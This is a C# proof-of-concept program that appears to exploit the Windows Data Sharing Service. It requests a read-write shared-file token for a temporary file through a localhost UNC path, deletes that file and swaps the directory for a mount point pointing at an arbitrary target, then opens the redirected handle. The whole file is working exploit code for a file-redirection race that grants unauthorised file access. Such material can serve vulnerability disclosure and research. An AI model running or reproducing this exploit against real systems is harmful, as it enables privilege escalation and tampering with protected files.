﻿using DataSharingServiceCommon;
using NtApiDotNet;
using System;
using System.IO;

namespace PoC
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: poc path");
                    return;
                }

                string file_name = Path.GetFileName(args[0]);
                string base_dir = Path.GetDirectoryName(args[0]);
                string temp_path = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString());
                string temp_target = Path.Combine(temp_path, file_name);

                Directory.CreateDirectory(temp_path);
                File.WriteAllText(temp_target, "");

                string unc_path = @"\??\UNC\localhost\" + temp_target.Replace(':', '$');
                Console.WriteLine("Opening path {0}", unc_path);

                DS_SHARE_ACCESS_CONTROL access_control = new DS_SHARE_ACCESS_CONTROL
                {
                    SharePermission = DS_SHARE_PERMISSION.ReadWrite
                };

                Api.DSCreateSharedFileToken(unc_path, access_control, 
                    DS_TOKEN_LIFETIME_TYPE.Type0, DS_TOKEN_USAGE.Type0, out string token).Check();
                Console.WriteLine("Token: {0}", token);

                File.Delete(temp_target);
                NtFile.CreateMountPoint(NtFileUtils.DosFileNameToNt(temp_path), NtFileUtils.DosFileNameToNt(base_dir), "REDIRECT");

                Api.DSOpenSharedFile(token, DS_OPEN_FLAGS.None, out SafeKernelObjectHandle handle).Check();
                using (var file = NtFile.FromHandle(handle))
                {
                    Console.WriteLine("Opened handle {0} - {1} - {2}", file.GrantedAccess, file.Win32PathName, file.Length);
                }
                Console.WriteLine("Done");
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
